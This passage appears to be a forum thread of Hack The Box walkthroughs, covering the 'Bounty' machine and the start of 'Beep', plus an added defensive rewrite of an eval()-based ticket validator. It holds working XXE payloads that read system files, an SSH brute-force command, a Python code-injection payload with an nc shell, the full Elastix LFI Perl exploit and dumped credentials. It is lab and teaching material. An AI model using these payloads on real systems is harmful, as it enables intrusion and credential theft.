      It is a bounty portal to submit information. It reflects the input - possible reflected XSS?

      ![[Pasted image 20210804121947.png]]

      It says that the db is not ready....

    #### nikto

    Nikto found an interesting php file called ***db.php***. Maybe it has something in common with the db from the portal.

    ```
    # nikto -h bounty.htb
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          10.10.11.100
    + Target Hostname:    bounty.htb
    + Target Port:        80
    + Start Time:         2021-08-04 05:06:04 (GMT-4)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.41 (Ubuntu)
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
    + OSVDB-3093: /db.php: This might be interesting... has been seen in web logs from an unknown scanner.
    + 7786 requests: 0 error(s) and 5 item(s) reported on remote host
    + End Time:           2021-08-04 05:13:45 (GMT-4) (461 seconds)
    ```

    #### db.php

    Tried changing the GET request to OPTIONS, PUT and POST but I always receive only 200 OK with no other information.

    ![[Pasted image 20210804122446.png]]

    #### Dirbuster

    Running dirbuster with the default dirbuster wordlist discovered the following directories and files:

    ![[dirb.png]]

    #### bounty.htb/resources/README.txt

    ```
    Tasks:

    [ ] Disable 'test' account on portal and switch to hashed password. Disable nopass.
    [X] Write tracker submit script
    [ ] Connect tracker submit script to the database
    [X] Fix developer group permissions
    ```

    #### bounty.htb/resources/bountylog.js

    From the code beneath we see that the variable and the input are actually XML. The only thing that comes to my mind is XXE. Let's go back to the portal and test.

    ```javascript
    function returnSecret(data) {
        return Promise.resolve($.ajax({
            type: "POST",
            data: {"data":data},
            url: "tracker_diRbPr00f314.php"
        }));
    }

    async function bountySubmit() {
        try {
            var xml = `<?xml version="1.0" encoding="ISO-8859-1"?>
            <bugreport>
            <title>${$('#exploitTitle').val()}</title>
            <cwe>${$('#cwe').val()}</cwe>
            <cvss>${$('#cvss').val()}</cvss>
            <reward>${$('#reward').val()}</reward>
            </bugreport>`
            let data = await returnSecret(btoa(xml));
            $("#return").html(data)
        }
        catch(error) {
            console.log('Error:', error);
        }
    }
    ```

    #### Portal test for XXE

    The following oneliner should send a connection to me if it works. In order for the application to understand the request, we need to encode it in base64 (ctrl+B in Burp Suite):

    ![[XXE test.png]]

    And the test is successful:

    ![[XXE Successful.png]]

    The following script is taken from [blackhillsinfosec](https://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/) with a little edit: we assign a variable *xml* with a value that will be executed once invoked from the developer console.

    ```javascript
    var xml = `<?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php"> ]>
    <bugreport>
    <title>&xxe;</title>
    <cwe>something</cwe>
    <cvss>something</cvss>
    <reward>something</reward>
    </bugreport>`
    ```

    To invoke xml:

    ```javascript
    returnSecret(btoa(xml));
    ```

    Copy the base64 and decode it to get the db file contents. It contains credentials. Now extract the users from the system with the following script:

    ```javascript
    var xml = `<?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    <bugreport>
    <title>&xxe;</title>
    <cwe>something</cwe>
    <cvss>something</cvss>
    <reward>something</reward>
    </bugreport>`
    returnSecret(btoa(xml));
    ```

    Move the users into a file and sort the contents:

    ```
    # cut -d : -f 1 passwords > usrs
    ```

    # Exploit

    #### Hydra

    ```
    # hydra -L usrs -p <password from db file> 10.10.11.100 ssh
    ```

    #### USER

    SSH-ing into the machine as the found user:credentials gives us user.

    # Privilege Escalation

    We have a ticket validator file that we can run as root with no password required, and we can also run python3.8 (how convenient :D)

    ```bash
    $ sudo -l
    Matching Defaults entries for development on bountyhunter:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User development may run the following commands on bountyhunter:
        (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
    ```

    #### Ticket Validator Analysis

    1. The ticket has to end with the .md extension.
    2. The contents of the file have to start with "# Skytrain Inc"
    3. The following line has to point to the destination as so: `## Ticket to`
    4. The ticket code should start with: `__Ticket Code:__`
    5. The code is looking for 2x star symbol ( ** ) to remove it and split at position 0 where the + is found. Example: `**102+`

    ```python
    #Skytrain Inc Ticket Validation System 0.1
    #Do not distribute this file.

    def load_file(loc):
        if loc.endswith(".md"):
            return open(loc, 'r')
        else:
            print("Wrong file type.")
            exit()

    def evaluate(ticketFile):
        #Evaluates a ticket to check for ireggularities.
        code_line = None
        for i,x in enumerate(ticketFile.readlines()):
            if i == 0:
                if not x.startswith("# Skytrain Inc"):
                    return False
                continue
            if i == 1:
                if not x.startswith("## Ticket to "):
                    return False
                print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
                continue

            if x.startswith("__Ticket Code:__"):
                code_line = i+1
                continue

            if code_line and i == code_line:
                if not x.startswith("**"):
                    return False
                ticketCode = x.replace("**", "").split("+")[0]
                if int(ticketCode) % 7 == 4:
                    validationNumber = eval(x.replace("**", ""))
                    if validationNumber > 100:
                        return True
                    else:
                        return False
        return False

    def main():
        fileName = input("Please enter the path to the ticket file.\n")
        ticket = load_file(fileName)
        #DEBUG print(ticket)
        result = evaluate(ticket)
        if (result):
            print("Valid ticket.")
        else:
            print("Invalid ticket.")
        ticket.close

    main()
    ```

    Ok, let's write our own ticket. The ticket has to meet the requirements in order to be executed. Then in the Ticket Code I decided to go with the example plus a random number which equals something that will return a TRUE condition, and used "and" to concatenate a system command that will spawn a reverse shell.

    ```
    # Skytrain Inc
    ## Ticket to
    __Ticket Code:__
    **102+7==109 and __import__('os').system('nc -nvlp 1234 -e "/bin/bash"') == False
    ```

    It seems that the system has a version of nc that does not support the -e flag. Oh, well, we can still dump the flag.

    ```
    $ sudo python3.8 /opt/skytrain_inc/ticketValidator.py
    Please enter the path to the ticket file.
    ticket.md
    Destination: 
    nc: invalid option -- 'e'
    usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
              [-m minttl] [-O length] [-P proxy_username] [-p source_port]
              [-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
              [-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
    Invalid ticket.
    ```

    Let's edit our ticket code.

    ```
    # Skytrain Inc
    ## Ticket to
    __Ticket Code:__
    **102+7==109 and __import__('os').system('cat /root/root.txt') == False
    ```

    And execute the code:

    ```
    $ sudo python3.8 /opt/skytrain_inc/ticketValidator.py
    Please enter the path to the ticket file.
    ticket.md
    Destination: 
    <flag>
    Invalid ticket.
    ```
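Everything after the arithmetic in the Bounty ticket works only because `ticketValidator.py` hands the code line to `eval()`. Added example (not h3xu's code and not the box's script): the same acceptance rules with `eval()` replaced by a whitelist AST walker that accepts integer literals and `+ - *` only, so a ticket whose code line carries `__import__(...)`, `and`, or any call is rejected rather than executed. The sample tickets are constructed from the format the post describes.

```python
"""Replace eval() in the ticket validator with a whitelist AST evaluator.

Added example, not from the forum post or the box's own script. The validator
evaluated the ticket-code line with eval(), so any Python expression after
the arithmetic ran as root. safe_eval() parses the expression with ast and
permits only integer literals and + - * arithmetic; evaluate_ticket() keeps
the original acceptance rules (".md" is left to the caller, then
"# Skytrain Inc", "## Ticket to ", "__Ticket Code:__", a "**"-prefixed code
line, code % 7 == 4 and value > 100).
"""
import ast
import operator

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def safe_eval(expr):
    """Evaluate integer + - * arithmetic only; anything else raises ValueError."""
    tree = ast.parse(expr.strip(), mode="eval")  # SyntaxError on garbage

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:  # excludes bool
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        # Call, Attribute, BoolOp, Compare, Name, Pow, ... all land here.
        raise ValueError(f"disallowed syntax: {type(node).__name__}")

    return walk(tree)


def evaluate_ticket(lines):
    """Same rules as the original validator, minus eval(). `lines` are the ticket's lines."""
    code_line = None
    for i, x in enumerate(lines):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            continue
        if x.startswith("__Ticket Code:__"):
            code_line = i + 1
            continue
        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            body = x.replace("**", "")
            try:
                ticket_code = int(body.split("+")[0])
                validation_number = safe_eval(body)
            except (ValueError, SyntaxError):
                return False  # malformed or non-arithmetic code line: reject, never execute
            return ticket_code % 7 == 4 and validation_number > 100
    return False


# Constructed sample tickets (not from the post).
GOOD_TICKET = ["# Skytrain Inc", "## Ticket to Sofia", "__Ticket Code:__", "**102+7"]
LOW_VALUE_TICKET = ["# Skytrain Inc", "## Ticket to Sofia", "__Ticket Code:__", "**95+4"]
PAYLOAD_TICKET = ["# Skytrain Inc", "## Ticket to Sofia", "__Ticket Code:__",
                  "**102+7==109 and __import__('os').system('id') == False"]


if __name__ == "__main__":
    for name, t in (("good", GOOD_TICKET), ("low", LOW_VALUE_TICKET), ("payload", PAYLOAD_TICKET)):
        print(name, "->", "Valid ticket." if evaluate_ticket(t) else "Invalid ticket.")
```

The rule check `int(body.split("+")[0])` is kept deliberately: the original's first gate already failed closed on non-numeric input, and the only code path that ever reached the interpreter was the `eval()` call, which the AST walker now replaces.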
  6. h3xu

    Beep

    # Enumeration

    The nmap scan enumerated 16 open ports running a variety of services.

    ```
    Nmap scan report for 10.10.10.7
    Host is up (0.049s latency).
    Not shown: 65519 closed ports
    PORT      STATE SERVICE    VERSION
    22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
    | ssh-hostkey: 
    |   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
    |_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
    25/tcp    open  smtp       Postfix smtpd
    |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
    80/tcp    open  http       Apache httpd 2.2.3
    |_http-server-header: Apache/2.2.3 (CentOS)
    |_http-title: Did not follow redirect to https://10.10.10.7/
    110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
    |_pop3-capabilities: APOP TOP RESP-CODES PIPELINING LOGIN-DELAY(0) USER IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE STLS UIDL EXPIRE(NEVER)
    111/tcp   open  rpcbind    2 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2            111/tcp   rpcbind
    |   100000  2            111/udp   rpcbind
    |   100024  1            875/udp   status
    |_  100024  1            878/tcp   status
    143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
    |_imap-capabilities: UIDPLUS LIST-SUBSCRIBED ATOMIC OK URLAUTHA0001 CHILDREN LISTEXT Completed RENAME UNSELECT IMAP4 X-NETSCAPE RIGHTS=kxte THREAD=ORDEREDSUBJECT IDLE CONDSTORE ACL CATENATE ANNOTATEMORE ID THREAD=REFERENCES SORT=MODSEQ LITERAL+ MAILBOX-REFERRALS NAMESPACE NO BINARY SORT STARTTLS MULTIAPPEND QUOTA IMAP4rev1
    443/tcp   open  ssl/https?
    | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
    | Not valid before: 2017-04-07T08:22:08
    |_Not valid after:  2018-04-07T08:22:08
    |_ssl-date: 2021-04-12T10:58:07+00:00; +3m45s from scanner time.
    878/tcp   open  status     1 (RPC #100024)
    993/tcp   open  ssl/imap   Cyrus imapd
    |_imap-capabilities: CAPABILITY
    995/tcp   open  pop3       Cyrus pop3d
    3306/tcp  open  mysql      MySQL (unauthorized)
    |_ssl-cert: ERROR: Script execution failed (use -d to debug)
    |_ssl-date: ERROR: Script execution failed (use -d to debug)
    |_sslv2: ERROR: Script execution failed (use -d to debug)
    |_tls-alpn: ERROR: Script execution failed (use -d to debug)
    |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
    4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
    4445/tcp  open  upnotifyp?
    4559/tcp  open  hylafax    HylaFAX 4.3.10
    5038/tcp  open  asterisk   Asterisk Call Manager 1.1
    10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
    |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
    ```

    # Web Application

    ## Port 80

    Going to https://10.10.10.7 I was greeted by the following login page:

    ![[Pasted image 20210412140605.png]]

    ## Port 10000

    The nmap scan revealed a Webmin httpd service on port 10k. Let's see it:

    ![[Pasted image 20210412142951.png]]

    Hmm, interesting. From the URL I can see a ***.cgi*** extension. Let's google the file '*session_login.cgi*'. The results are quite interesting. Let's save some time and try to use "vuln.nse" on port 10k:

    ```
    # nmap -sV -p 10000 --script vuln 10.10.10.7                                     1 ⨯
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-12 07:46 EDT
    Pre-scan script results:
    | broadcast-avahi-dos: 
    |   Discovered hosts:
    |     224.0.0.251
    |   After NULL UDP avahi packet DoS (CVE-2011-1002).
    |_  Hosts are all up (not vulnerable).
    Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
    NSE Timing: About 66.20% done; ETC: 07:47 (0:00:00 remaining)
    Nmap scan report for 10.10.10.7
    Host is up (0.050s latency).

    PORT      STATE SERVICE VERSION
    10000/tcp open  http    MiniServ 1.570 (Webmin httpd)
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-litespeed-sourcecode-download: 
    | Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
    | /index.php source code:
    | <h1>Error - Bad Request</h1>
    |_<pre>This web server is running in SSL mode. Try the URL <a href='https://10.10.10.7:10000/'>https://10.10.10.7:10000/</a> instead.<br></pre>
    |_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
    | http-phpmyadmin-dir-traversal: 
    |   VULNERABLE:
    |   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
    |     State: UNKNOWN (unable to test)
    |     IDs:  CVE:CVE-2005-3299
    |       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
    |       
    |     Disclosure date: 2005-10-nil
    |     Extra information:
    |       ../../../../../etc/passwd :
    |   <h1>Error - Bad Request</h1>
    |   <pre>This web server is running in SSL mode. Try the URL <a href='https://10.10.10.7:10000/'>https://10.10.10.7:10000/</a> instead.<br></pre>
    |   
    |     References:
    |       http://www.exploit-db.com/exploits/1244/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-vuln-cve2006-3392: 
    |   VULNERABLE:
    |   Webmin File Disclosure
    |     State: VULNERABLE (Exploitable)
    |     IDs:  CVE:CVE-2006-3392
    |       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
    |       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
    |       to bypass the removal of "../" directory traversal sequences.
    |       
    |     Disclosure date: 2006-06-29
    |     References:
    |       http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
    |       http://www.exploit-db.com/exploits/1997/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    ```

    Apparently there could be local file inclusion and file disclosure vulnerabilities.

    ```
    msf6 auxiliary(admin/webmin/file_disclosure) > options

    Module options (auxiliary/admin/webmin/file_disclosure):

       Name     Current Setting   Required  Description
       ----     ---------------   --------  -----------
       DIR      /unauthenticated  yes       Webmin directory path
       Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPATH    /etc/passwd       yes       The file to download
       RPORT    10000             yes       The target port (TCP)
       SSL      false             no        Negotiate SSL/TLS for outgoing connections
       VHOST                      no        HTTP server virtual host

    Auxiliary action:

       Name      Description
       ----      -----------
       Download  Download arbitrary file

    msf6 auxiliary(admin/webmin/file_disclosure) > set RHOSTS 10.10.10.7
    RHOSTS => 10.10.10.7
    msf6 auxiliary(admin/webmin/file_disclosure) > set SSL true
    [!] Changing the SSL option's value may require changing RPORT!
    SSL => true
    msf6 auxiliary(admin/webmin/file_disclosure) > exploit

    [*] Running module against 10.10.10.7
    [*] Attempting to retrieve /etc/passwd...
    [*] The server returned: 404 File not found
    <h1>Error - File not found</h1>

    [*] Auxiliary module execution completed
    ```

    Ok, so we receive a 404 File not found for /etc/passwd... Hm.. I have tried running it a couple more times until I decided to postpone it and look for other stuff.

    # Elastix

    Elastix is a unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialing.
## Elastix default username:passwords

A quick google search reveals the following interesting page: [Elastix Default Login Password](https://www.elastix.org/community/threads/default-passwords-not-password.8416/). I have tried the following credentials with no success.

Elastix PBX Default Credentials

Elastix PBX systems install with multiple default passwords according to the wiki manual:

Initial access to the Web interface

Enter in the Web interface: Open web browser and go to https://ip-address-of-elastix-server/
Username: admin
Password: one you assigned @ install

Initial access to third party applications

1. To use Sugar CRM: Username: admin Password: password
2. To use A2bill: Username: admin Password: mypassword
3. Operator Flash Panel (from 0.6 version): Password: eLaStIx.2oo7
4. For accessing Freepbx (without being contracted) use: Username: admin Password: admin
5. For accessing vtigerCRM use: Username: admin Password: admin

## Searchsploit

```
# searchsploit elastix
--------------------------------------------------------------- ---------------------------------
 Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting                          | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities        | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities  | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion               | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                              | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                             | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution         | php/webapps/18650.py
--------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

After researching the exploits I found that according to [Security Focus](https://www.securityfocus.com/bid/55078/discuss):

Elastix 'graph.php' Local File Include Vulnerability

Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. Elastix 2.2.0 is vulnerable; other versions may also be affected.

Ok, let's locate the ***graph.php*** exploit on our machine:

```
# locate 37637.pl
/usr/share/exploitdb/exploits/php/webapps/37637.pl
```

The exploit's code:

```
# cat 37637.pl
source: https://www.securityfocus.com/bid/55078/info

Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

Elastix 2.2.0 is vulnerable; other versions may also be affected.

#!/usr/bin/perl -w

#------------------------------------------------------------------------------------#
#Elastix is an Open Source Sofware to establish Unified Communications.
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------#
############################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;)
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki \n";
print "\t 0day Elastix 2.2.0 \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action

use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);

$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";

$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ 'This file is part of FreePBX') {
    print "\n read amportal.conf file : $answer \n\n";
    print " successful read\n";
} else {
    print "\n[-] not successful\n";
}
```

So, let's go to the application and manually test it for LFI.

```
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action
```

```
# This file is part of FreePBX.
#
#    FreePBX is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 2 of the License, or
#    (at your option) any later version.
#
#    FreePBX is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with FreePBX.  If not, see .
#
# This file contains settings for components of the Asterisk Management Portal
# Spaces are not allowed!
# Run /usr/src/AMP/apply_conf.sh after making changes to this file

# FreePBX Database configuration
# AMPDBHOST: Hostname where the FreePBX database resides
# AMPDBENGINE: Engine hosting the FreePBX database (e.g. mysql)
# AMPDBNAME: Name of the FreePBX database (e.g. asterisk)
# AMPDBUSER: Username used to connect to the FreePBX database
# AMPDBPASS: Password for AMPDBUSER (above)
# AMPENGINE: Telephony backend engine (e.g. asterisk)
# AMPMGRUSER: Username to access the Asterisk Manager Interface
# AMPMGRPASS: Password for AMPMGRUSER
#
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE

# AMPBIN: Location of the FreePBX command line scripts
# AMPSBIN: Location of (root) command line scripts
#
AMPBIN=/var/lib/asterisk/bin
AMPSBIN=/usr/local/sbin

# AMPWEBROOT: Path to Apache's webroot (leave off trailing slash)
# AMPCGIBIN: Path to Apache's cgi-bin dir (leave off trailing slash)
# AMPWEBADDRESS: The IP address or host name used to access the AMP web admin
#
AMPWEBROOT=/var/www/html
AMPCGIBIN=/var/www/cgi-bin
# AMPWEBADDRESS=x.x.x.x|hostname

# FOPWEBROOT: Path to the Flash Operator Panel webroot (leave off trailing slash)
# FOPPASSWORD: Password for performing transfers and hangups in the Flash Operator Panel
# FOPRUN: Set to true if you want FOP started by freepbx_engine (amportal_start), false otherwise
# FOPDISABLE: Set to true to disable FOP in interface and retrieve_conf.  Useful for sqlite3
#             or if you don't want FOP.
#
#FOPRUN=true
FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE

# FOPSORT=extension|lastname
# DEFAULT VALUE: extension
# FOP should sort extensions by Last Name [lastname] or by Extension [extension]

# This is the default admin name used to allow an administrator to login to ARI bypassing all security.
# Change this to whatever you want, don't forget to change the ARI_ADMIN_PASSWORD as well
ARI_ADMIN_USERNAME=admin

# This is the default admin password to allow an administrator to login to ARI bypassing all security.
# Change this to a secure password.
ARI_ADMIN_PASSWORD=jEhdIekWmdjE

# AUTHTYPE=database|none
# Authentication type to use for web admininstration. If type set to 'database', the primary
# AMP admin credentials will be the AMPDBUSER/AMPDBPASS above.
AUTHTYPE=database

# AMPADMINLOGO=filename
# Defines the logo that is to be displayed at the TOP RIGHT of the admin screen. This enables
# you to customize the look of the administration screen.
# NOTE: images need to be saved in the ..../admin/images directory of your AMP install
# This image should be 55px in height
AMPADMINLOGO=logo.png

# USECATEGORIES=true|false
# DEFAULT VALUE: true
# Controls if the menu items in the admin interface are sorted by category (true), or sorted
# alphabetically with no categories shown (false).

# AMPEXTENSIONS=extensions|deviceanduser
# Sets the extension behavior in FreePBX.  If set to 'extensions', Devices and Users are
# administered together as a unified Extension, and appear on a single page.
# If set to 'deviceanduser', Devices and Users will be administered seperately. Devices (e.g.
# each individual line on a SIP phone) and Users (e.g. '101') will be configured
# independent of each other, allowing association of one User to many Devices, or allowing
# Users to login and logout of Devices.
AMPEXTENSIONS=extensions

# ENABLECW=true|false
ENABLECW=no
# DEFAULT VALUE: true
# Enable call waiting by default when an extension is created. Set to 'no' to if you don't want
# phones to be commissioned with call waiting already enabled. The user would then be required
# to dial the CW feature code (*70 default) to enable their phone. Most installations should leave
# this alone. It allows multi-line phones to receive multiple calls on their line appearances.

# CWINUSEBUSY=true|false
# DEFAULT VALUE: true
# For extensions that have CW enabled, report unanswered CW calls as 'busy' (resulting in busy
# voicemail greeting). If set to no, unanswered CW calls simply report as 'no-answer'.

# AMPBADNUMBER=true|false
# DEFAULT VALUE: true
# Generate the bad-number context which traps any bogus number or feature code and plays a
# message to the effect. If you use the Early Dial feature on some Grandstream phones, you
# will want to set this to false.

# AMPBACKUPSUDO=true|false
# DEFAULT VALUE: false
# This option allows you to use sudo when backing up files. Useful ONLY when using AMPPROVROOT
# Allows backup and restore of files specified in AMPPROVROOT, based on permissions in /etc/sudoers
# for example, adding the following to sudoers would allow the user asterisk to run tar on ANY file
# on the system:
#   asterisk localhost=(root)NOPASSWD: /bin/tar
#   Defaults:asterisk !requiretty
# PLEASE KEEP IN MIND THE SECURITY RISKS INVOLVED IN ALLOWING THE ASTERISK USER TO TAR/UNTAR ANY FILE

# CUSTOMASERROR=true|false
# DEFAULT VALUE: true
# If false, then the Destination Registry will not report unknown destinations as errors. This should be
# left to the default true and custom destinations should be moved into the new custom apps registry.

# DYNAMICHINTS=true|false
# DEFAULT VALUE: false
# If true, Core will not statically generate hints, but instead make a call to the AMPBIN php script,
# and generate_hints.php through an Asterisk's #exec call. This requires Asterisk.conf to be configured
# with "execincludes=yes" set in the [options] section.

# XTNCONFLICTABORT=true|false
# BADDESTABORT=true|false
# DEFAULT VALUE: false
# Setting either of these to true will result in retrieve_conf aborting during a reload if an extension
# conflict is detected or a destination is detected. It is usually better to allow the reload to go
# through and then correct the problem but these can be set if a more strict behavior is desired.

# SERVERINTITLE=true|false
# DEFAULT VALUE: false
# Precede browser title with the server name.

# USEDEVSTATE = true|false
# DEFAULT VALUE: false
# If this is set, it assumes that you are running Asterisk 1.4 or higher and want to take advantage of the
# func_devstate.c backport available from Asterisk 1.6. This allows custom hints to be created to support
# BLF for server side feature codes such as daynight, followme, etc.

# MODULEADMINWGET=true|false
# DEFAULT VALUE: false
# Module Admin normally tries to get its online information through direct file open type calls to URLs that
# go back to the freepbx.org server. If it fails, typically because of content filters in firewalls that
# don't like the way PHP formats the requests, the code will fall back and try a wget to pull the information.
# This will often solve the problem. However, in such environment there can be a significant timeout before
# the failed file open calls to the URLs return and there are often 2-3 of these that occur. Setting this
# value will force FreePBX to avoid the attempt to open the URL and go straight to the wget calls.

# AMPDISABLELOG=true|false
# DEFAULT VALUE: true
# Whether or not to invoke the FreePBX log facility

# AMPSYSLOGLEVEL=LOG_EMERG|LOG_ALERT|LOG_CRIT|LOG_ERR|LOG_WARNING|LOG_NOTICE|LOG_INFO|LOG_DEBUG|LOG_SQL|SQL
# DEFAULT VALUE: LOG_ERR
# Where to log if enabled, SQL, LOG_SQL logs to old MySQL table, others are passed to syslog system to
# determine where to log

# AMPENABLEDEVELDEBUG=true|false
# DEFAULT VALUE: false
# Whether or not to include log messages marked as 'devel-debug' in the log system

# AMPMPG123=true|false
# DEFAULT VALUE: true
# When set to false, the old MoH behavior is adopted where MP3 files can be loaded and WAV files converted
# to MP3. The new default behavior assumes you have mpg123 loaded as well as sox and will convert MP3 files
# to WAV. This is highly recommended as MP3 files heavily tax the system and can cause instability on a busy
# phone system.

# CDR DB Settings: Only used if you don't use the default values provided by FreePBX.
# CDRDBHOST: hostname of db server if not the same as AMPDBHOST
# CDRDBPORT: Port number for db host
# CDRDBUSER: username to connect to db with if it's not the same as AMPDBUSER
# CDRDBPASS: password for connecting to db if it's not the same as AMPDBPASS
# CDRDBNAME: name of database used for cdr records
# CDRDBTYPE: mysql or postgres mysql is default
# CDRDBTABLENAME: Name of the table in the db where the cdr is stored cdr is default

# AMPVMUMASK=mask
# DEFAULT VALUE: 077
# Defaults to 077 allowing only the asterisk user to have any permission on VM files. If set to something
# like 007, it would allow the group to have permissions. This can be used if setting apache to a different
# user then asterisk, so that the apache user (and thus ARI) can have access to read/write/delete the
# voicemail files. If changed, some of the voicemail directory structures may have to be manually changed.

# DASHBOARD_STATS_UPDATE_TIME=integer_seconds
# DEFAULT VALUE: 6
# DASHBOARD_INFO_UPDATE_TIME=integer_seconds
# DEFAULT VALUE: 20
# These can be used to change the refresh rate of the System Status Panel. Most of
# the stats are updated based on the STATS interval but a few items are checked
# less frequently (such as Asterisk Uptime) based on the INFO value

# ZAP2DAHDICOMPAT=true|false
